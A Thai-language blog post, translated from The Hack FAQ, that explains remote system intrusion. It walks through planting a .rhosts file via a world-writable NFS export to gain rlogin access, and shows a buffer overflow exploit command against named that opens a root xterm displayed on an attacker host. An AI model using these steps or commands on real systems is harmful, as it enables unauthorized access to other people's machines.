RSS

อะไรคือการเจาะระบบแบบ remote ?

11 ธ.ค.

การเจาะระบบแบบ remote เกิดขึ้นเมื่อคุณโจมตีเซิร์ฟเวอร์ที่คุณไม่ได้ล๊อกอินเข้าไป โดยโจมตีจากเซิร์ฟเวอร์อื่น ถึงแม้ว่าในบางกรณีคุณสามารถโจมตีจากเครื่องพีซีทั่ว ๆ ไป (ขึ้นอยู่กับระบบปฏิบัติการ)

การเดาแอกเคาท์ของยูสเซอร์และรหัสผ่าน (ยกเว้นแต่ว่ามีแอกเคาท์ guest) ในระบบอื่นไม่ถือว่าเป็นการเจาะแบบ remote เราจะสมมุติว่า คุณไม่รู้ชื่อแอกเคาท์และรหัสผ่านในระบบอื่น

การเจาะระบบแบบ remote แบ่งเป็นสองประเภท โดยมักจะเป็นการเจาะโดยอาศัยช่องโหว่ที่มีในเซอร์วิสที่กำลังรันอยู่ในเซิร์ฟเวอร์ที่ตกเป็นเหยื่อ (ที่มีการกำหนดค่าระบบไม่ถูกต้องหรือยอมให้มีการเข้าถึงมากเกินไป การ export NFS (network file system) mount แบบ read/write ให้ทุกคนสามารถเข้าถึงได้อาจไม่ใช่สิ่งที่ไม่เลวร้าย แต่ถ้าคุณสามารถ NFS mount ไดเร็กทอรีที่มีไฟล์ .rhosts ได้เป็นสิ่งที่เลวร้ายมาก นอกจากนี้ daemon ที่รันอยู่บางชนิดอาจมีปัญหาที่อาจถูกโจมตีแบบ buffer overflow แบบ remote ได้ ยอมให้ใครบางคนจากเซิร์ฟเวอร์อื่นสามารถใช้คำสั่งในเครื่องที่ตกเป็นเป้าหมายได้ตามต้องการ

ต่อไปนี้เป็นตัวอย่างสองตัวอย่างด้วยกัน

– คุณเป็น root ในเครื่องที่ชื่อว่า badguy
– คุณค้นพบว่าโฮสต์เป้าหมาย export /home2/old เป็นแบบ read/write ให้ทุกคนสามารถเข้าถึงได้
– คุณใช้คำสั่ง finger ไปยังแอกเคาท์ต่าง ๆ แล้วพบว่า home directory ของยูสเซฮร์ fred คือ /home2/old/fred เขาไม่ได้ log in หลายเดือนแล้ว
– คุณสร้างแอกเคาท์ fred ในเครื่อง badguy ทันที
– แล้วคุณจึง mount /home2/old ในเครื่องเป้าหมาย แล้วสร้างไฟล์ .rhosts เพื่อให้เครื่องที่ตกเป็นเหยื่อเชื่อถือเครื่อง badguy
– หลังจากที่คุณเป็นยูสเซอร์ fred ในเครื่อง badguy คุณจึงเชื่อมต่อแบบ rlogin ไปยังเครื่องเป้าหมายโดยเป็นยูสเซอร์ fred
ต่อไปนี้เป็นตัวอย่างการโจมตีโดยอาศัย buffer overflow

– โฮสต์ที่เป็นเป้าหมายกำลังรัน named
– คุณได้เขียน exploit ที่เกี่ยวกับ named ที่ยอมให้คุณสามารถส่งคำสั่งได้ตามต้องการผ่าน named daemon ซึ่งใช้เทคนิค buffer overflow คุณคอมไพล์มันและตั้งชื่อว่า sploit
– คุณพิมพ์ว่า: sploit victim.nmrc.org “/usr/X11R6/bin/xterm -display badguy.whatever:0”
– มีวินโดวส์ปรากฏขึ้นที่จอเทอร์มินัลของคุณที่กำลังรันเป็น root อยู่ที่ victim.nmrc.org
แปลจาก The Hack FAQ

Advertisements
 
ใส่ความเห็น

Posted by บน ธันวาคม 11, 2008 in Computer

 

ใส่ความเห็น

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / เปลี่ยนแปลง )

Twitter picture

You are commenting using your Twitter account. Log Out / เปลี่ยนแปลง )

Facebook photo

You are commenting using your Facebook account. Log Out / เปลี่ยนแปลง )

Google+ photo

You are commenting using your Google+ account. Log Out / เปลี่ยนแปลง )

Connecting to %s

 
%d bloggers like this: